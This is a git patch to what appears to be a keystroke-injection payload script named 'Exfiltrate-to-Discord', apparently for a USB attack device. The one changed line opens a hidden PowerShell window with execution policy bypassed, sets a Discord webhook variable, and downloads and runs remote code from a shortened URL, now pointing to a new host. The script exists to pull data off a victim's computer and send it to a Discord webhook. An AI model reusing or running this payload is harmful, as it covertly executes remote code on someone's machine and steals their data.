From d32a9edb3fc5dc21d8b44bce8c311ed023ecf168 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Tue, 17 Jun 2025 10:22:34 +0000 Subject: [PATCH] Update Exfiltrate-to-Discord.txt --- Exfiltrate-to-Discord/Exfiltrate-to-Discord.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Exfiltrate-to-Discord/Exfiltrate-to-Discord.txt b/Exfiltrate-to-Discord/Exfiltrate-to-Discord.txt index ceccc3e..4d12a33 100644 --- a/Exfiltrate-to-Discord/Exfiltrate-to-Discord.txt +++ b/Exfiltrate-to-Discord/Exfiltrate-to-Discord.txt @@ -14,6 +14,6 @@ REM open powershell (remove -W Hidden to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='WEBHOOK_HERE'; irm https://is.gd/bw_ex_to_dc | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc='WEBHOOK_HERE'; irm https://bw0.cc/exfl | iex ENTER